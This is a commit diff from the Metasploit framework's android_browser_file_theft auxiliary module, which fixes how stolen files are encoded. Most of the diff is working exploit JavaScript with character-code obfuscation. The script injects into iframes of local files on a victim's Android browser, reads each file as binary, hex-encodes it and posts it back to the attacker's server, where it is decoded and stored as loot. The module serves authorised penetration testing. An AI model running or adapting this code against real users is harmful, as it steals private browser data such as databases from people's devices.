Skip to content

Commit c4b8560

Browse files
joevennixjoevennix
committed
Fix encoding, oops.
1 parent d486d17 commit c4b8560

File tree

1 file changed

+13
-4
lines changed

1 file changed

+13
-4
lines changed

modules/auxiliary/gather/android_browser_file_theft.rb

Lines changed: 13 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -64,13 +64,14 @@ def on_request_uri(cli, request)
6464

6565
def process_post(cli, request)
6666
data = JSON.parse(request.body)
67+
contents = hex2bin(data['data'])
6768
file = File.basename(data['url'])
68-
print_good "File received: #{request.body.length.to_f/1024}kb #{file}"
69+
print_good "File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}"
6970
loot_path = store_loot(
7071
file,
7172
'application/x-sqlite3',
7273
cli.peerhost,
73-
data,
74+
contents,
7475
File.basename(data['url']),
7576
"#{cli.peerhost.ljust(16)} Android browser file"
7677
)
@@ -125,8 +126,11 @@ def exploit_js
125126
'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+
126127
'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
127128
'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+
128-
'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+
129-
'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+
129+
'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.responseType=String.fromCharCode(97,'+
130+
'114,114,97,121,98,117,102,102,101,114);x.send();x.onload=function(){window.onerror=alert;'+
131+
'var buff = new Uint8Array(x.response);var hex = Array.prototype.map.call(buff, function(d)'+
132+
'{var c = d.toString(16);return (c.length < 2) ? 0+c : c;}).join(new String); top.postMessa'+
133+
'ge({data:hex,url:location.href}, String.fromCharCode(42));'+
130134
'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+
131135
'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();';
132136
brokenFrame.contentWindow.location = "";
@@ -136,4 +140,9 @@ def exploit_js
136140
|
137141
end
138142

143+
# TODO: Make this a proper Rex::Text function
144+
def hex2bin(hex)
145+
hex.chars.each_slice(2).map(&:join).map { |c| c.to_i(16) }.map(&:chr).join
146+
end
147+
139148
end

0 commit comments

Comments
 (0)